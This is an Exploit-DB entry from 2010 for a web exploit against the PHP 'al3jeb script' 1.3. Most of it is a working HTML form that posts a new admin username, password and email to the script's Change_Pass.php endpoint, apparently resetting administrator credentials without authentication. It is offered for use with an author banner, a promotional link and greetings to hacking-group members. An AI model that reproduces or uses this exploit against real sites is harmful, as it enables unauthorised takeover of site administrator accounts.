al3jeb script - Remote Change Password

EDB-ID:

11185

CVE:

N/A


Author:

alnjm33

Type:

webapps


Platform:

PHP

Date:

2010-01-18


<!--------
Exploit Title :al3jeb script Remote Change Password Exploit
Author: alnjm33
Software Link: http://www.traidnt.net/vb/attachment.php?attachmentid=354606&d=1237376300
Version: 1.3
Tested on:1.3
MY home : Sec-war.com
:::::::::::::::exploit:::::::::::::::::::::
---------->

<html>
<head>
<title> al3jeb script Remote Change Password Exploit  </title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form action=http://SITE/al3jeb/Change_Pass.php method=post style="text-align: center">
<b>For More </b>
<p><b>visit us</b></p>
<p>
<a href="http://sec-war.com/cc/index.php" style="text-decoration: none; font-weight: 700">
http://sec-war.com/cc/index.php</a></p>
<p>
<br>
User: <input name="adminn" type="text" id="adminn" value="" />
<br>
Pass: <input name="adminp" type="password" id="adminp" value=""  />
<br>
Email <input name="mail" type="text" id="adminm" value="" />
<br>
<input type="submit" name="Submit" value="Sec-War" /><br>
&nbsp;<br>
</p>
</form>
</body>
<html>
<!----------
:::::::::::::::::::::::::::::::
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso -JaMbA-RoOt_EgY-jago-dz-XR57 all sec-war.com members
:::::::::::::::::::::::::::::
----------->